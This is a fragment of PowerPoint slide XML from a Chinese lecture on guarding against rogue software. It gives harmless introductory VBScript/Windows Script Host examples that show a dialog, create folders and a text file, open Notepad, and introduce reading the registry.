          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防范流氓软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75779" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1774825" y="1916113"/>
            <a:ext cx="4257675" cy="3251200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75780" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6167438" y="2573338"/>
            <a:ext cx="4279900" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76802" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76803" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631950" y="908050"/>
            <a:ext cx="5135563" cy="3600450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76804" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232400" y="1989138"/>
            <a:ext cx="5327650" cy="3937000"/>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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>访问文件系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12293" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993775" y="1691640"/>
            <a:ext cx="8996045" cy="4643120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WScript.Echo("WSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>应用举例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>")        '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>弹出对话框窗口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>盘根目录下建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>个新文件夹</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dim objdir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set objdir=WScript.Createobject("Scripting.filesystemobject")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for k=1 to 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   sNewFolder="d:\WSHsample" &amp; k    '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>给新的文件夹命名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objdir.Createfolder(sNewFolder)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>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p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838835" y="1534160"/>
            <a:ext cx="9188450" cy="4672965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>盘根目录创建一个文本文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>testfile.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set RegWsh = Wscript.CreateObject("Wscript.Shell")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RegWsh.Run ("notepad " &amp; Wscript.ScriptFullName) '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SHELL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象启动程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set fs = Wscript.CreateObject("Scripting.FileSystemObject")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set a = fs.CreateTextFile("c:\testfile.txt", True)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a.WriteLine("Hello World!")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a.Close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>访问注册表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837565" y="2000250"/>
            <a:ext cx="10304780" cy="4237355"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>创建对象 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>对象变量名 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>= WScript.CreateObject("WScript.Shell") </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="-윤고딕120"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>对象的方法 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>读注册表键值的操作</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>RegRead </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>创建</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
